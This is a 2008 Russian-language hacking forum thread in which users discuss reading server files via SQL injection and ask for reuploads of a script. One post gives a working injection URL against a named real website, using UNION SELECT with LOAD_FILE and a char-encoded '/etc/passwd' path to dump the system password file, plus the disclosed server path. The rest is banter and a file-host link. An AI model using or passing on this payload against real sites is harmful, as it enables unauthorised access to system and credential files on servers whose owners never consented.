 |
|
10.03.2008, 01:12
|
|
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
С нами:
9752260
Репутация:
150
|
|
путь самому прописывать в форму
а полный путь до сайта на серве можно поглядеть в файле etc/passwd
еще не разу не видал чтобы чтение passwd было запрещено
|
|
|
10.03.2008, 01:26
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
С нами:
10393869
Репутация:
2032
|
|
Сообщение от Sleep
путь самому прописывать в форму
а можно в адресную строку. и нажать enter. и все
Сообщение от Sleep
а полный путь до сайта на серве можно поглядеть в файле etc/passwd
может ты даже скажешь, как?)
|
|
|
|
10.03.2008, 02:03
|
|
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
С нами:
9752260
Репутация:
150
|
|
может ты даже скажешь, как?)
к тому же чаще всего при скуле полный путь до скрипта выводится в ошибке
вот пример чтения файла `/etc/passwd`
PHP код:
http://www.hardvision.ru/?dir=news&action=internet&id=-1+union+select+1,2,3,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),5,6,7,8/*
/home/site/hardvision.ru/
Последний раз редактировалось Sleep; 10.03.2008 в 02:09..
|
|
|
|
10.03.2008, 02:40
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами:
10459106
Репутация:
2996
|
|
бугога сори не удиржался....
|
|
|
|
10.03.2008, 20:44
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
С нами:
10393869
Репутация:
2032
|
|
Сообщение от [ cash ]
бугога сори не удиржался....
+1
Sleep явно не в теме
|
|
|
|
12.03.2008, 14:26
|
|
Постоянный
Регистрация: 24.08.2007
Сообщений: 474
С нами:
9849598
Репутация:
126
|
|
Сообщение от Piflit
+1
Sleep явно не в теме
С чего бы это не в теме? на счет LOAD_FILE это он прав. Надо добавить а как человек путь определит это его уже проблема. (пути можно определить и через другие сайты хотящиеся на этом сервере.)
|
|
|
|
12.03.2008, 21:25
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
С нами:
10393869
Репутация:
2032
|
|
Сообщение от heks
С чего бы это не в теме? на счет LOAD_FILE это он прав. Надо добавить а как человек путь определит это его уже проблема. (пути можно определить и через другие сайты хотящиеся на этом сервере.)
load_file был добавлен в последней версии. следите за обновлениями
|
|
|
|
28.08.2008, 00:31
|
|
Новичок
Регистрация: 15.03.2008
Сообщений: 5
С нами:
9555562
Репутация:
0
|
|
Всем респект. Хотелось бы всё-же увидеть данный скрипт. Ссылка вроде битая. Может кто в курсе, где можно слить?
|
|
|
|
28.08.2008, 00:49
|
|
Участник форума
Регистрация: 11.04.2007
Сообщений: 103
С нами:
10043772
Репутация:
273
|
|
Сообщение от NOAkill
Всем респект. Хотелось бы всё-же увидеть данный скрипт. Ссылка вроде битая. Может кто в курсе, где можно слить?
Ссылка не битая, но перекинул сюда http://dump.ru/file_catalog/1024852
|
|
|
|
23.09.2008, 04:49
|
|
Постоянный
Регистрация: 30.09.2007
Сообщений: 815
С нами:
9796693
Репутация:
659
|
|
Можно как-нибудь перезалить сабж?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [dword]](/avatars/avatar35341.jpg?836679){kind=avatar}
Линейный вид
